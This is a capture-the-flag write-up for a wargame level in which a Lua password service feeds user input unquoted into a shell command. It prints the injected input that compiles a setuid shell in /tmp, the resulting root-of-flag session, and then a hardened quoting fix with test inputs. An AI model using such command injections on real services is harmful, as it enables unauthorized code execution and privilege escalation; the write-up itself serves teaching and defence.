In Level12 we are given the following code:

local socket = require("socket")
local server = assert(socket.bind("", 50001))

function hash(password)
  -- Vulnerable: password is concatenated into a shell command line unquoted
  prog = io.popen("echo "..password.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  -- keep only the 40 hex digits of the SHA-1
  data = string.sub(data, 1, 40)

  return data
end

while 1 do
  local client = server:accept()
  client:send("Password: ")
  local line, err = client:receive()
  if not err then
    print("trying " .. line) -- log from where ;\
    local h = hash(line)

    if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
      client:send("Better luck next time\n");
    else
      client:send("Congrats, your token is 413**CARRIER LOST**\n")
    end
  end

  client:close()
end



This is a command injection: the password value is controlled by the user and is concatenated into a command that is run on the system. All we need to do is inject our own commands. In this case, we will use the shell wrapper shown in level 11:

[email protected]:~$ nc localhost 50001
Password: 1; gcc -o /tmp/shell /tmp/shell.c; chmod +s /tmp/shell; echo 1
Better luck next time
[email protected]:~$ ls -la /tmp
total 32
drwxrwxrwt  4 root    root    4096 Nov 24 12:37 .
drwxr-xr-x 22 root    root    4096 Dec  6  2011 ..
-rwsr-sr-x  1 flag12  flag12  7241 Nov 24 12:43 shell
-rw-rw-r--  1 level11 level11  180 Nov 24 11:48 shell.c

Now let's run our shell and get the flag:

[email protected]:~$ cd /tmp
[email protected]:/tmp$ ./shell
sh-4.2$ id
uid=987(flag12) gid=1013(level12) egid=987(flag12) groups=987(flag12),1013(level12)
sh-4.2$ getflag
You have successfully executed getflag on a target account

Voila !!
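The injection works because hash() splices the client's line into a shell command. The block below is an added example, not part of the level or of this write-up: a hash() that passes the line to the shell as a single quoted word and checks what comes back. It assumes a POSIX /bin/sh with printf and sha1sum on PATH; MAX_LEN and shell_quote are names introduced for the example.

```lua
-- Added example: hardened hash(); not the level's code.
-- Assumes a POSIX /bin/sh plus printf and sha1sum on PATH.

local MAX_LEN = 256 -- assumed cap; the original sets no limit

-- Quote s as one literal shell word: wrap it in single quotes and
-- write each embedded ' as '\'' (close quote, escaped quote, reopen).
local function shell_quote(s)
  return "'" .. (s:gsub("'", "'\\''")) .. "'"
end

-- Returns the 40-hex-digit SHA-1 of password .. "\n", or nil, reason.
local function hash(password)
  if #password > MAX_LEN then return nil, "too long" end
  -- A NUL would truncate the C string handed to popen().
  if password:find("\0", 1, true) then return nil, "NUL byte" end

  -- printf '%s\n' emits the same trailing newline as echo, but does
  -- not interpret options or escapes in the data.
  local cmd = "printf '%s\\n' " .. shell_quote(password) .. " | sha1sum"
  local prog = assert(io.popen(cmd, "r"))
  local data = prog:read("*all")
  prog:close()

  local digest = string.sub(data, 1, 40)
  -- Anything other than 40 hex digits means the pipeline misbehaved.
  if #digest ~= 40 or not digest:match("^%x+$") then
    return nil, "unexpected sha1sum output"
  end
  return digest
end

-- Constructed inputs: a plain word, shell metacharacters, a quote.
for _, line in ipairs({ "1", "1; echo 1", "a'b", "x | cat; y" }) do
  local digest, reason = hash(line)
  print(string.format("%s -> %s", line, digest or reason))
end
```

Every input yields one 40-digit digest because the whole line is hashed as data. Hashing in-process with a SHA-1 library would remove the shell from the path entirely; quoting is shown here because it changes only the line that causes the bug.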